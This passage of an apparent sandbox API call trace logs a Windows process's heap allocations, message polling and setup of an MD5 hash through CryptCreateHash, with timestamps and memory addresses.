(HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0186.621] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0186.622] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.622] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.622] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.622] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.622] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.622] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0186.622] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.623] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.623] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0186.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.624] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.624] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.625] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0186.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0186.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0186.627] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0186.628] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0186.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.629] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0186.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0186.629] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54db8 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0186.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e78 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0186.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0186.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0186.632] RtlAllocateHeap 